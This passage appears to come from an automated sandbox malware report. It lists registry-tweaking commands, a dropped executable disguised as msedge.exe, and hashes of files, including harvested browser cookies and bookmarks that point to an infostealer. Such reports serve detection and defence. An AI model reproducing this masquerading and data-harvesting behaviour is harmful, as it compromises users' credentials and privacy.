                                                                                                                                  Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v "SoftLandingEnabled" /t REG_DWORD /d "0" /f
                                                                                                                                  2⤵
                                                                                                                                    PID:2464
                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                    Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v "RotatingLockScreenEnabled" /t REG_DWORD /d "0" /f
                                                                                                                                    2⤵
                                                                                                                                      PID:4024
                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                      Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "PublishUserActivities" /t REG_DWORD /d "0" /f
                                                                                                                                      2⤵
                                                                                                                                        PID:4668
                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                        Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "UploadUserActivities" /t REG_DWORD /d "0" /f
                                                                                                                                        2⤵
                                                                                                                                          PID:1788
                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                          Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\BackgroundAccessApplications" /v "GlobalUserDisabled" /t REG_DWORD /d "1" /f
                                                                                                                                          2⤵
                                                                                                                                            PID:2192
                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                            Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Search" /v "BackgroundAppGlobalToggle" /t REG_DWORD /d "0" /f
                                                                                                                                            2⤵
                                                                                                                                              PID:4624
                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                              Reg.exe add "HKLM\Software\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config" /v "DownloadMode" /t REG_DWORD /d "0" /f
                                                                                                                                              2⤵
                                                                                                                                                PID:3496
                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Themes\Personalize" /v "EnableTransparency" /t REG_DWORD /d "0" /f
                                                                                                                                                2⤵
                                                                                                                                                  PID:5080
                                                                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                                                                  timeout /t 1 /nobreak
                                                                                                                                                  2⤵
                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                  PID:1312
                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                  Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "TaskbarAnimations" /t REG_DWORD /d 0 /f
                                                                                                                                                  2⤵
                                                                                                                                                    PID:4668
                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                    timeout /t 1 /nobreak
                                                                                                                                                    2⤵
                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                    PID:1788
                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                    Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "ListviewAlphaSelect" /t REG_DWORD /d 0 /f
                                                                                                                                                    2⤵
                                                                                                                                                      PID:2192
                                                                                                                                                    • C:\Windows\system32\timeout.exe
                                                                                                                                                      timeout /t 1 /nobreak
                                                                                                                                                      2⤵
                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                      PID:4624
                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                      Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "EnableBalloonTips" /t REG_DWORD /d "0" /f
                                                                                                                                                      2⤵
                                                                                                                                                        PID:4992
                                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                                        timeout /t 1 /nobreak
                                                                                                                                                        2⤵
                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                        PID:668
                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                        Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "DisallowShaking" /t REG_DWORD /d "1" /f
                                                                                                                                                        2⤵
                                                                                                                                                          PID:4240
                                                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                                                          timeout /t 1 /nobreak
                                                                                                                                                          2⤵
                                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                                          PID:4520
                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                          Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\People" /v "PeopleBand" /t REG_DWORD /d "0" /f
                                                                                                                                                          2⤵
                                                                                                                                                            PID:1908
                                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                                            timeout /t 1 /nobreak
                                                                                                                                                            2⤵
                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                            PID:412
                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                            Reg.exe add "HKLM\Software\Policies\Microsoft\Windows\System" /v "EnableActivityFeed" /t REG_DWORD /d "0" /f
                                                                                                                                                            2⤵
                                                                                                                                                              PID:4852
                                                                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                                                                              timeout /t 1 /nobreak
                                                                                                                                                              2⤵
                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                              PID:524
                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                              Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "ShowTaskViewButton" /t REG_DWORD /d "0" /f
                                                                                                                                                              2⤵
                                                                                                                                                                PID:2956
                                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                                timeout /t 1 /nobreak
                                                                                                                                                                2⤵
                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                PID:2980
                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\NetworkProvider" /v "RestoreConnection" /t REG_DWORD /d 0 /f
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:2968
                                                                                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                                                                                  timeout /t 1 /nobreak
                                                                                                                                                                  2⤵
                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                  PID:1104
                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                  Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "HideSCAMeetNow" /t REG_dWORD /d 1 /f
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:4300
                                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                                    timeout /t 1 /nobreak
                                                                                                                                                                    2⤵
                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                    PID:1248
                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                    Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Feeds" /v "ShellFeedsTaskbarViewMode" /t REG_DWORD /d 2 /f
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:4696
                                                                                                                                                                    • C:\Windows\system32\timeout.exe
                                                                                                                                                                      timeout /t 1 /nobreak
                                                                                                                                                                      2⤵
                                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                                      PID:3832
                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                      Reg.exe add "HKLM\Software\Policies\Microsoft\Windows\CloudContent" /v DisableSoftLanding /t REG_DWORD /d 1 /f
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:5092
                                                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                                                        timeout /t 1 /nobreak
                                                                                                                                                                        2⤵
                                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                                        PID:3508
                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                        Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\FileSystem" /v "LongPathsEnabled" /t REG_DWORD /d "1" /f
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:2456
                                                                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                                                                          timeout /t 1 /nobreak
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                                                          PID:4964
                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                          Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "ShowSyncProviderNotifications" /t REG_DWORD /d "0" /f
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:1308
                                                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                                                            timeout /t 1 /nobreak
                                                                                                                                                                            2⤵
                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                            PID:5080
                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                            Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Themes\Personalize" /v "AppsUseLightTheme" /t REG_DWORD /d "0" /f
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:1672
                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                              Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Themes\Personalize" /v "AppsUseLightTheme" /t REG_DWORD /d "0" /f
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:2164
                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                Reg.exe add "HKCU\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main" /v "Theme" /t REG_DWORD /d "1" /f
                                                                                                                                                                                2⤵
                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                PID:2752
                                                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                                                timeout /t 1 /nobreak
                                                                                                                                                                                2⤵
                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                PID:1948
                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                Reg.exe add "HKEY_USERS\.DEFAULT\Control Panel\Keyboard" /v InitialKeyboardIndicators /t REG_SZ /d "2147483650" /f
                                                                                                                                                                                2⤵
                                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                                PID:4464
                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                Reg.exe add "HKCU\Control Panel\Keyboard" /v "KeyboardSpeed" /t REG_SZ /d "31" /f
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:4860
                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                  Reg.exe add "HKEY_USERS\.DEFAULT\Control Panel\Keyboard" /v "InitialKeyboardIndicators" /t REG_SZ /d "2" /f
                                                                                                                                                                                  2⤵
                                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                                  PID:4048
                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                  Reg.exe add "HKCU\Control Panel\Keyboard" /v "InitialKeyboardIndicators" /t REG_SZ /d "2" /f
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:668
                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                    Reg.exe add "HKEY_USERS\.DEFAULT\Control Panel\Keyboard" /v "KeyboardDelay" /t REG_SZ /d "0" /f
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                                                    PID:4240
                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                    Reg.exe add "HKEY_USERS\.DEFAULT\Control Panel\Keyboard" /v "KeyboardSpeed" /t REG_SZ /d "31" /f
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                                                    PID:1032
                                                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                                                    timeout 2
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                    PID:1308
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\msedge.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\msedge.exe
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                  PID:960
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\msedge.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\msedge.exe
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                  PID:1908
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\msedge.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\msedge.exe
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                  PID:4636

                                                                                                                                                                                Network

                                                                                                                                                                                MITRE ATT&CK Enterprise v15

                                                                                                                                                                                Replay Monitor

                                                                                                                                                                                Loading Replay Monitor...

                                                                                                                                                                                Downloads

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\84cd062140476b7060b43475e7db9d50\Admin@SPDEBJWH_de-DE\Browsers\Edge\Cookies.txt

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  370B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  fee302333cb8b53e438beb2b2e5fc18c

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  5a41c5ed8da9a518c757cc44e0120095cb0eaa2a

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  1968091069d88745c3b6dbd583908542dbc46237f0c8cfbb2f276572b56d955e

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  694792d377a2bb53c836c4ac0706409b48665ed6add9d758f86205ba4bb2264b09c8105ce267262a102e62574daf13df1c9d7f929e1048ea7c71e6222ec4e551

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\84cd062140476b7060b43475e7db9d50\Admin@SPDEBJWH_de-DE\Browsers\Firefox\Bookmarks.txt

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  105B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  2e9d094dda5cdc3ce6519f75943a4ff4

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  5d989b4ac8b699781681fe75ed9ef98191a5096c

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\84cd062140476b7060b43475e7db9d50\Admin@SPDEBJWH_de-DE\System\Process.txt

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  158cdbba8412195887b1f310d0c93e90

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  8a9ecaae4d65d715cb1ca96dcd437ed344ae80be

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  ceb2ec56a892834473494e2a901c63bd1296420df9e77ff50f2358174f5fb209

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  8cb5c2ad374eaefa719636e8719abc6036f0fa0a56eb677fad15422e4c69b3ac48af75c6afeaa0729a5181db0c11a177e279535ee44b8312bb99a3a34fa564d3

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\msedge.exe.log

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  654B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  2ff39f6c7249774be85fd60a8f9a245e

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  684ff36b31aedc1e587c8496c02722c6698c1c4e

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  2KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  6cf293cb4d80be23433eecf74ddb5503

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  24fe4752df102c2ef492954d6b046cb5512ad408

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  152B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  dc058ebc0f8181946a312f0be99ed79c

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  0c6f376ed8f2d4c275336048c7c9ef9edf18bff0

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  378701e87dcff90aa092702bc299859d6ae8f7e313f773bf594f81df6f40bf6a

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  36e0de64a554762b28045baebf9f71930c59d608f8d05c5faf8906d62eaf83f6d856ef1d1b38110e512fbb1a85d3e2310be11a7f679c6b5b3c62313cc7af52aa

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  152B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  a0486d6f8406d852dd805b66ff467692

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  77ba1f63142e86b21c951b808f4bc5d8ed89b571

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  c0745fd195f3a51b27e4d35a626378a62935dccebefb94db404166befd68b2be

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  065a62032eb799fade5fe75f390e7ab3c9442d74cb8b520d846662d144433f39b9186b3ef3db3480cd1d1d655d8f0630855ed5d6e85cf157a40c38a19375ed8a

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  144B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  e65f2f7adf4b44069ed61e192f6a7db8

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  8c1a61803a5c52ef86156d617d9b9c42068925e4

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  ff4406823b67ae3ae9b7c044f2cb5ddd53f6c2074c99d7c22686f8f98339042d

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  77cc1348aa79f00142eeab14ec39d38cf8b35b6408d72342de15fd9a8c919c87a24120e46c2be5bc1aff99331834fb29d9adb55c805ddddb6ae6135b4553a39f

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  20KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  1bdd9dee30a145ac77f1bb0e512cc50c

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  ecda32b1dd9e6e1b59951656b1d28ad65b4983e7

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  75aa0699dc6119a55716a3088c913e513dcedc38b98e92877fea1b4377ae8f05

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  13c6d8dd4ed0a0e9123eae29215f77ab512ea46adb8999202b8a83af01c38198c6ee62af7a63699ef6c93cb1ce35c57f155d09e001b09ea5c4053d1bf6770310

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  124KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  07f1b5455d1ed3403742e4f80aaed22d

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  93d6712b46336b018632ead43dd83a8dcea7bd7e

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  a205bdd4aa0b2453396312c887119eb347c2bcc697f7750b318a4afac2f9853f

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  640838556b5c9116992cc3a12f22c5541127e472c7c678a1ec2c3d782545349bf02c0d7a3d8207d0ea5b0c264be4432c7a255aa9c067adaf5eee39a3f4beb712

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  1KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  3fd600851826562cbbc2e6666eb5c4e6

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  9317336d295e074f2fa60e792874041ac359e60d

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  ea623f281d0048ac79e70f26600ed27166f0f45e944529c42fcf1c9eff685e20

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  5ad033e0f905488da08676ac8f5ced554d7f31c5f048d06508c634d351535096c41e4fcf60abd2336fd9942c82adea68c73bdf4745bb7f1d2aacf0855e14eaf1

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  5KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  ceed05cf6fce9aba56afe233fe48361b

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  8bd50ae9ccff66e4cc9bd6421d19f3b539a1a783

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  83a6c0ff5f206294df276297f4934d3fdf64b35993f2e62e3062ee3c4b6ff229

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  283dacf30f6839c226f3ac5d03621f1f03de3c4a8b146c1ba5756f459133f0a3ffd911368f368826636c5a851b49a784ef1640462d2999f1c48db68346438700

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  7KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  03f41e57b59c0fd643a60da84ae107c0

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  f963b8b46979fb5cfd9e11463fdaf644d39b702d

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  e4d71f61c71700b7de3a5dd81d00ed8f3caf67035e55ca11fb89b3707f6e1098

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  910c379cfa064f5be1a8148f3220f27ad813eed7451a5089acfba01d61b03c07d9e4c6683fd61303d63862975a231e9dbad350023132be5c9e6e6bcc3c508ba8

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  16B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  6752a1d65b201c13b62ea44016eb221f

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  10KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  8b17486d7cd1e77cd448e339c8f08de0

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  1525c30489ffc401a1f4786419af615bc944edba

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  80c646b9af9332332ea3c5613954e4531c3343f02259cf9ef018f8ee746c9f05

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  79ddb8b9430fa2676b16e7a0bf6a7985eeac37df3b4a4f61a5aad6482bc0b929ae012846356a3b9abca513cb2e0e00c36356bd3a9cf193aabde89ce136dd5b37

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  10KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  b708e6d24207f1a0e12717c5e87b0a33

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  7967ff24714e253d9e06f7212ee454caf65ae8d2

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  67b51817391310c66acce0abeeba82529364010b4c9964e5b8c40792763551e2

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  4ca759cdca5b080a33a1b5ad9dec4bf78201f404261c98441d462309b0c60ff633e0afde664a7f8fa0e0f0d19e9046b7f2fadc0b5411dd3c6ead172ee5581315

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  10KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  2ffe73c0668c56cefcc27b3944d67b99

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  b37ccfbd9399d5bc846d6b0a9109c13f6d4c68d0

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  ebbd67167246612d53e46e5044ce70a822e7a1e8d6d79f86c9e141468793a58f

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  1a704116d4d74d80384fe4d24331ffd774c7b12a5616ef4c0b6af3df94556a42f86cf922ef9d980c43f196582a9eba60eb214813121a90626206baeef2c671ac

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  64B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  a6c9d692ed2826ecb12c09356e69cc09

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  def728a6138cf083d8a7c61337f3c9dade41a37f

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  2f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_x4z3xw2e.eui.ps1

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  60B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\exm.zip

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  13.3MB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  57a6527690625bea4e4f668e7db6b2aa

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  c5799fd94999d128203e81e22c6d9fdb86e167ee

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  076e01b09f9c5cccc273b2f7dfa1a1efccc1a8e8ebf98a7eee756024b93bad17

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  d86c7f79989eb0781e15f8631048506ffab338f933ddfedbcc2c7464447770beaf21b7ed3cba2ebb97be5ffdc9a450f2df2e2313efaeb8e8101f2ee53c066e4e

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\bbe2dbec5da16fe0d6955b21dff4e87d\msgid.dat

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  1B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  cfcd208495d565ef66e7dff9f98764da

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

                                                                                                                                                                                • C:\Users\Admin\Downloads\Nicht bestÃĪtigt 174666.crdownload

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  672KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  f9ca73d63fe61c4c401528fb470ce08e

                                                                                                                                                                                  SHA1

